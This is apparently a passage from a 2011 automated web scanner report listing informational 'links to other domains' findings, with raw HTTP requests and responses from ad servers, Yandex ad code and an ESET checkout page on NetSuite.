Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1043494379?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUlNedbcTg0PaihQfN8uf83YXzbLhnZW8sdXNhLHQsMTMwMzc0MTI0OTEwMCxjLDI4OTY2OSxwYyw2OTExMixhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBRkVBQUFBQUFBQUFVUUFBQUFNRE16QUJBNFhvVXJrZmhGRURoZWhTdVItRVVRSUNVOEZFbUMxWjhTc1lkYTZiMnppVS1nN1ZOQUFBQUFJQWVBUUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0EzQ1JRRTRnZ0JBZ1VDQUFNQUFBQUFreHpXVndBQUFBQS4vY25kPSF3QV9IdHdqYzh3SVF4OGtLR0FBZzBjY0JLSlFJTVFBQUFMeEg0UlJBUWdvSUFCQUFHQUFnQVNnQlFnc0luMFlRQUJnQUlBTW9BVUlMQ0o5R0VBQVlBQ0FDS0FGSUFWQUFXTGNTWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CSlNqQlBvTzFUWnZUQ0pEdmxRZnF2Tnp5QjlmcS1OTUJsNkdVN0JpWG42ZXpJUUFRQVJnQklBQTRBVkNBeC1IRUJHREo3b09JOEtQc0VvSUJGMk5oTFhCMVlpMDBORFUyTVRneU1UTTFPVFUyT1RjMG9BSEQ4djNzQTdJQkUzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMjZBUW96TURCNE1qVXdYMkZ6eUFFSjJnRWJhSFIwY0RvdkwzZDNkeTVzYVhabGFtOTFjbTVoYkM1amIyMHZtQUtJSjhBQ0JNZ0NoZExQQ3VBQ0FPb0NHalUyTlRVdmJHb3VhRzl0WlhCaFoyVXZiRzluWjJWa2IzVjBxQU1CNkFQNEFfVURDQUNBaE9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHhtcThuVzNDR2ZKOFJRbmVtOVZlLUduNlBzX2cmY2xpZW50PWNhLXB1Yi00NDU2MTgyMTM1OTU2OTc0JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
MlV2Ykc5bloyVmtiM1YwcUFNQjZBUDRBX1VEQ0FDQWhPQUVBWUFHNmNTRjlNV1Exb2t5Jm51bT0xJnNpZz1BR2lXcXR4bXE4blczQ0dmSjhSUW5lbTlWZS1HbjZQc19nJmNsaWVudD1jYS1wdWItNDQ1NjE4MjEzNTk1Njk3NCZhZHVybD0K&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732017/direct/01/rnd=1043494379" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=156936241" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...
23.2. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=71518370253033940&clkurl=http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU./referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUhvvA3uMYtZiectC07uf2QDyvEasDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HdswpnHJJbtdxykV4XcMp5zchBKecawMHVK4N6JbvQLe4wN0i4X4bpz4JO21c.tpP7tyES1_7yRm1OOVOCC_GKXdswSOccke_CuKUm7GAHbecbStOuekPPXHLdazELWeqi1Nu2k1FnHKVZb4MTJNDGVgdnjAw6uQxMHwU.g8EoDSRH8BYDYwTRtx6u4WA8gy.mzMYGDiACWknI1AxQ.AtRiYgxWDAyCDMwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZeODpD2QYAwCGTZPB

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUlAz8J7YZQuuVKsw_ef0aAc0zrdADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34v16vZuOQ6smNO4ZRLcruOUy7C6xpOOb8JITjlXBs4oHJtQHd.B7rTBebODgn32zj1Sdhp49LXfnLnJlz62k_OqMUpd0J4MU65Ywse4ZQ7.lUQp9yMBey45WxbccpNf.iJW65jJW45U12cctNuKuKUqyzzBYY7I275biGgPIPvlp0NDBzAhLSTkZGRgSHwFiMzkGIwYGIQBvEVzMDCSwvAwiyZjGxAQZYQJjZGdiBDfhcTAzdIGTQNggxkAAAFopIm; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:23:13 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3734
Date: Mon, 25 Apr 2011 14:23:13 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=499353087?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUiPbw6T2uHVm68iJ.eWaH0XWjcghnZW8sdXNhLHQsMTMwMzc0MTM5MzU2NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0g0WHJVYmdlQTBBZmhldFJ1QjREUUFBQUFNRE16QWhBemN6TXpNek1DRUROek16TXpNd0lRT3RnOFFIemNyMGJTc1lkYTZiMnppVWhnN1ZOQUFBQUFDOGhBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUpfQ2s4QWh3UUJBZ1VDQUFRQUFBQUFmeVdNUVFBQUFBQS4vY25kPSEweFZtWVFqMjVRSVF4c2tLR0FBZzBjY0JLRTh4QUFBQXdNek1DRUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUDhVWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL2dhbWVzLndlYmFsdGEucnUvL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUIyRGJySUlPMVRlQ3RJY2ZNc1FldnI2M2tEZGZxLU5NQm42Q1U3QmpieE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkweE1UTTBPREl5TmpneU5URXdPRGM1b0FIRDh2M3NBN0lCRUdkaGJXVnpMbmRsWW1Gc2RHRXVjblc2QVFveE5qQjROakF3WDJGenlBRUoyZ0VZYUhSMGNEb3ZMMmRoYldWekxuZGxZbUZzZEdFdWNuVXZtQUxXRXNBQ0JNZ0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
Z0NoZExQQ3FnREFlZ0RhZWdEMUFmb0E4RUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHlwLS1TTzJsSU1jZWx0YWpKd24ycUZDVE5uM0EmY2xpZW50PWNhLXB1Yi0xMTM0ODIyNjgyNTEwODc5JmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=499353087" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1508694624" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...
23.3. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /code/57617?rnd=281388&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html%3F14857%231&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html?14857
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:32:04 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:32:04 GMT
Expires: Mon, 25 Apr 2011 14:32:04 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:32:04 GMT
Content-Length: 6529

var y5_sLinkHead = 'http://an.yandex.ru/count/6c8D5kaQUsO40000ZhHUMDi4XP4H3f6nxk6s0PDKfC00040C27a3';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {
if (win
...[SNIP]...
</span>','=fWlZM9K2cm5kGpa1YPyID9YD79ol96Arcgx8GZIIf8FR7PsJZWAFhnEXOf-tLbB-3vbfe91n0gU04q5_1W00','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>','=s3ihHfK2cmHhK3i1agPnRWoFll97v0AVjn3RzWMam00000m8U0G0'];
var aLinkAll = ['<a href="http://direct.yandex.ru/search?from=http://webalta.ru/news.html%3F14857%231&ref-page=57617" target=_blank>...... ....................</a>
...[SNIP]...
23.4. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /code/57617?rnd=309442&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2F&grab=dNCf0L7QuNGB0LrQvtCy0LDRjyDRgdC40YHRgtC10LzQsCBXZWJhbHRh HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7397

var y5_sLinkHead = 'http://an.yandex.ru/count/CvVSK7g7hke40000ZhKnMDi4XP4H3fQb-Qd2aRHle6OCarIaeW00G7m3';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {
if
...[SNIP]...
</span>','=i8Br_PK2cm5kGpa1YQ8wP1oOYncShoHYjPgkj8TAagXH_XwTe-vs0u-xwCP92v-ryehu3fbfe91g6AUF6q6ae000G7y7','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>','=bnwoofK2cmHhK3i1cg6sEbYIfd5k38-w49TH3f-pz3zU2wG0U0G0'];
var aLinkAll = ['<a href="http://direct.yandex.ru/search?from=http://webalta.ru/&ref-page=57617" target=_blank>...... ....................</a>
...[SNIP]...
23.5. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:09 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:09 GMT
Expires: Mon, 25 Apr 2011 14:20:09 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:09 GMT
Content-Length: 6626

var y5_sLinkHead = 'http://an.yandex.ru/count/J9i6sP-l6Xu40000ZhanMDi4XP4H3fQl8qgkaQbw69MJLAJE000030Xz0m00';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
</span>','=FiNnVvK2cm5kGpa1YQHnPpAOM9ouVOzJ0PgeI45PagCd7nkTer610O-xcdbd19-o2bGc39aEe91n0gU4U45w1m00','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>','=J1j5YPK2cmHhK3i1cfBX59AcSMuCZxvQBdC1dx8uiR4FfC00000C27m4'];
var aLinkAll = ['<a href="http://direct.yandex.ru/search?from=http://webalta.ru/news.html&ref-page=57617" target=_blank>...... ....................</a>
...[SNIP]...
23.6. http://an.yandex.ru/code/66894  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/66894

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /code/66894?rnd=928638&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fpogoda.webalta.ru%2F&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:30 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:30 GMT
Expires: Mon, 25 Apr 2011 14:20:30 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:30 GMT
Content-Length: 3561

var y5_sLinkHead = 'http://an.yandex.ru/count/1QrEGmZSpqW40000ZhuoMDi4XPvK49Qke0McaRm8UAa3arIapW0000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
</span>','=6PqWd9K2cm5kGpI9YLYOM9oymSKk1Pg9ZvAcFOKUdQZRgmQFk1JM6WsVlwnQ7GUPLw2GSGAdYZD1fC80000C27m7','0'] ];
var aLinkHow = ['<a target="_blank" href="http://advertising.yandex.ru/welcome/?from=context">........ ....................</a>
...[SNIP]...
23.7. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

NETSPARKER /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368828460:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; path=/
Set-Cookie: NLVisitorId=rcHW8495AYoCDqLY; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AZACDgGn; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 26851


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
<div><img src="https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt=""></div>
...[SNIP]...
23.8. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.4/.f

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /s.nl/c.438708/n.1/sc.4/.f?ext=T&login=T&reset=T&newcust=T&noopt=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:46 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256561231:616363742D6A6176613032372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=862
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33384


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document.lo
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
<div><img src="https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt=""></div>
...[SNIP]...
23.9. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
